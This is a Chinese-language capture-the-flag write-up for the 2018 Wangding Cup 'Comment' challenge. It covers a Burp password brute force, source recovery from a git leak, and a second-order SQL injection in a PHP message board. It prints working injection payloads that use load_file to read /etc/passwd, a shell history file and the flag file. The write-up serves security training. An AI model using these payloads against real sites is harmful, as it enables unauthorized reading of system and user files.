审计练习14——[网鼎杯 2018]Comment

平台：buuoj.cn
打开靶机是个留言板
发帖需要登录，只缺密码的后三位，burp爆破即可
扫下目录

git泄露，githacker源码下下来
write_do.php
显示不全

历史文件恢复一下


完整代码如下

include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

可以看到addslashes给每个参数都进行了处理

但数据库存入的数据是会自动做过滤处理的，也就是说数据还是会原样插入到数据库中
而这部分

mysql_fetch_array直接调用category，造成二次注入。

构造

进入留言板在content构造*/#提交
此时数据库语句是

$sql = "insert into comment
            set category = 'aaa',content=database(),/*',
                content = '*/#',
                bo_id = '$bo_id'";

后面的*/#和前一个末尾/*拼接把后面的都注释掉
就成了

$sql = "insert into comment
            set category = 'aaa',
            content=database(),

成功读取数据库

解题

load_file读文件位置

aaa',content=(select( load_file('/etc/passwd'))),/*

查看使用过的系统命令

aaa',content=(select(load_file("/home/www/.bash_history"))),/*

十六进制读.DS.Store

aaa',content=(select hex(load_file("/tmp/html/.DS_Store"))),/*

读flag_8946e1ff1ee3e40f.php

aaa',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*

ps:tmp/html文件下读出来的flag是假的
解码即得flag